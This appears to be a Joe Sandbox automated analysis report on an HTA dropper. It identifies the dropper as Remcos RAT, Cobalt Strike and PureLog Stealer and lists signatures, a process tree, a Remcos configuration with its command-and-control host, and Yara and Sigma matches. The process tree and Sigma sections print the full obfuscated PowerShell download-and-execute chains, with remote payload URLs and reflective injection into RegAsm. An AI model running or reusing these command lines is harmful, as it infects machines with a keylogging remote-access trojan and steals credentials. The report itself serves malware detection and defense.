Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LJ1IZDkHyE.hta

Overview

General Information

Sample name:LJ1IZDkHyE.hta
renamed because original name is a hash value
Original sample name:d6a04e7ba31d063b7176e3f9fc96c46a.hta
Analysis ID:1518499
MD5:d6a04e7ba31d063b7176e3f9fc96c46a
SHA1:e8929b14ea18c20d4a81ac3faf681031924c9d14
SHA256:2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2
Tags:htaRATRemcosRATuser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 5508 cmdline: mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 940 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1600 cmdline: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 1672 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 768 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 2472 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • RegAsm.exe (PID: 6020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "ramcxx.duckdns.org:50312:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-M3P7YT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              Click to see the 25 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                11.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  11.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    11.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aab8:$a1: Remcos restarted by watchdog!
                    • 0x6b030:$a3: %02i:%02i:%02i:%03i
                    11.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b7c:$str_b2: Executing file:
                    • 0x65bfc:$str_b3: GetDirectListeningPort
                    • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65728:$str_b7: \update.vbs
                    • 0x64ba4:$str_b9: Downloaded file:
                    • 0x64b90:$str_b10: Downloading file:
                    • 0x64c34:$str_b12: Failed to upload file:
                    • 0x65bc4:$str_b13: StartForward
                    • 0x65be4:$str_b14: StopForward
                    • 0x65680:$str_b15: fso.DeleteFile "
                    • 0x65614:$str_b16: On Error Resume Next
                    • 0x656b0:$str_b17: fso.DeleteFolder "
                    • 0x64c24:$str_b18: Uploaded file:
                    • 0x64be4:$str_b19: Unable to delete:
                    • 0x65648:$str_b20: while fso.FileExists("
                    • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 22 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi32_1600.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Base64 Encoded PowerShell Command Detected
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
                      Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 